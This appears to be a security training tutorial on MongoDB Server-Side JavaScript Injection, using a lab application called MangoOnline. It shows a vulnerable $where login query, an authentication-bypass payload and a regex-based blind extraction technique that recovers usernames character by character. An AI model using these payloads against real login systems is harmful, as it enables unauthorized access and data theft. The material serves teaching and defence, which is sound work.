Introduction to NoSQL Injection
Server-Side JavaScript Injection
Theory
One type of injection specific to NoSQL databases is Server-Side JavaScript Injection (SSJI): the attacker gets the server to execute arbitrary JavaScript in the context of the database. In MongoDB this happens when user input is concatenated into a $where expression, which the database evaluates as JavaScript against every document in the collection. Like any other injection, it may be in-band, blind, or out-of-band, depending on the scenario. A quick example would be a server that uses a $where query to check username/password combinations:
...
// Vulnerable: both form fields are concatenated straight into the $where JavaScript string
.find({$where: "this.username == \"" + req.body['username'] + "\" && this.password == \"" + req.body['password'] + "\""});
...
In this case, user input becomes part of the JavaScript that $where evaluates, leading to JavaScript injection. An attacker could do many things here. For example, to bypass authentication, they could pass " || ""== as both the username and the password, so that the server evaluates db.users.find({$where: 'this.username == "" || ""=="" && this.password == "" || ""==""'}). Because && binds more tightly than ||, this reads as A || (B && C) || D, and the final term ""=="" is always true, so the expression is true for every document. Every document is returned and the attacker is presumably logged in as one of the returned users.
MangoOnline
In this section, we will be looking at the fourth web application - MangoOnline. This application is vulnerable to Server-Side JavaScript Injection.
The site itself is just a login form with nothing else to look at.
Authentication Bypass
We can fill out the form with arbitrary data and intercept the login request to take a better look. The request looks similar to the one for MangoMail from the authentication bypass section.

If we try the same authentication bypass methods as before, however, none of them work. The operator-based payloads from earlier only apply when our input ends up inside a query object; if the server concatenates it into a string instead, they have no effect. At this point, it is worth checking whether some SSJI payloads work, in case the server is running a $where query that looks something like this:
db.users.find({
$where: 'this.username === "<username>" && this.password === "<password>"'
});
For this example, we could set the username to " || true || ""==, which makes the expression evaluate to true regardless of what this.username and this.password are, since || short-circuits as soon as it reaches the literal true:
db.users.find({
$where: 'this.username === "" || true || ""=="" && this.password === "<password>"'
});
Since this is just JavaScript being evaluated, we can verify that the statement always evaluates to true by pasting it into the developer console of our browser:

As expected, the statement evaluates to true, even with this.username and this.password being undefined. With this confirmation, we can try to log in with this "username" and an arbitrary password, taking care to URL-encode the necessary characters (the quotes, spaces, and equals signs) in the request body.

This should result in us bypassing authentication altogether, since the $where expression evaluated to true for every document.
Note that the application does not display the real username of the account we were logged in as (whichever document was matched first); it displays the SSJI payload we submitted instead.
Blind Data Extraction
So we have proved that we can bypass authentication with Server-Side JavaScript Injection, and we have established that the username of the user we are logged in as is not shown to us, so let's work on extracting that information.
The steps to do this are essentially the same as the steps from the Blind Data Extraction and Automating Blind Data Extraction sections, simply with different syntax.
As a first request, we can use the payload " || (this.username.match('^.*')) || ""== to verify that there is a username matching ^.*. This works as an oracle because match() returns a (truthy) array on a hit and null otherwise, so the injected || clause is true exactly when some document's username matches the pattern. This first request is expected to return true (log us in), so it's more of a sanity check.

Next, we can start guessing the first character of the username with payloads like " || (this.username.match('^a.*')) || ""==. If no username matches, as is the case with ^a.* (the match is case-sensitive), the application fails to log in.

After a bit of trying, the payload: " || (this.username.match('^H.*')) || ""==" logs us in, meaning there is a username that matches ^H.*.

By continuing these steps, appending each confirmed character to the known prefix and guessing the next one, we can dump the entire username.